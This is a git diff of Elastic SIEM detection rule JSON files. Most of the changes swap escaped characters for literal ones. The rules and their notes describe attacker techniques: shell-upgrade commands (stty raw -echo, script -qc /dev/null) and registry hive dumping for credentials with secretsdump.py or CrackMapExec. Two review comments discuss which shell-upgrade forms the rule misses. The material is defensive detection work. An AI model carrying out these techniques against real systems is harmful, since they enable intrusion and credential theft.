ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json index ee6555e5da4..2b955d5967b 100644 --- a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Upgrade of Non-interactive Shell", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count \u003e= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count >= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json index a0eb1ffae49..0410fe4f74b 100644 --- a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json +++ b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Upgrade of Non-interactive Shell", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count \u003e= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count >= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json index b844294f5c6..fb74842f16c 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json 
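Review bot: The `script` branch of the query in this hunk only fires for the exact four-argument form (`script -qc <shell> /dev/null`), because it requires `process.args_count == 4` together with `-qc`/`-c` and `/dev/null`; the shorter `script -q /dev/null` and `script /dev/null` invocations, which also allocate a pty, carry three and two arguments and fall outside the rule, and a `-cq` flag order is not in the list either. Whether that narrowing is a deliberate false-positive trade-off is not visible here. If broader coverage is wanted, the branch could be relaxed to `(process.name == "script" and process.args == "/dev/null" and process.args_count >= 2)`, keeping the `stty raw -echo` branch as is. Note this file is a versioned rule export (`_2.json`), so any such change belongs in the rule's source definition rather than in this artifact.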
@@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json index d0586e31923..fd11cbd87e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json 
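Review bot: Replacing `\u003c` with a literal `<` in the `setup` string is byte-different but value-identical — any conformant JSON parser decodes both to the same `<8.2` — so neither the rule's behaviour nor the text Kibana renders changes. The escaped form is what an HTML-safe serializer (for example Go's `encoding/json` default) emits so the document can be embedded inside a `<script>` block; with it removed, a consumer that splices these rule bodies verbatim into HTML would lose that protection, though nothing visible here indicates such a consumer exists. Because the same rewrite is applied to frozen historical versions (`_104`, `_105`), it is worth confirming that the serializer used for this release is the one later releases will also use, so these artifacts do not flip between the two encodings on every update.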
@@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json index 3368291f6d9..11e1d7c44c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json index 6b1f9261df6..895f3f29108 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json 
+++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json index 9a96243c00b..38cf1e0e423 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json index 34e458693e8..5a00b4c727b 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json 
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where host.os.type == \"windows\" and event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where host.os.type == \"windows\" and event.action == \"creation\" and 
process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -102,7 +102,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -115,7 +115,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
@@ -137,7 +137,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json index ee86936942e..960782ea8dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json 
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" 
and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -97,7 +97,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -110,7 +110,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
@@ -132,7 +132,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json index 4d4c8c84ffe..c6e4e6ce194 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json 
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" 
and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -97,7 +97,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -109,7 +109,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
@@ -131,7 +131,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json index 28dd2684e98..b0488d5783f 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json 
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" 
@@ -72,7 +72,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json index 25e19bef885..4b76b6b37a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json +++ 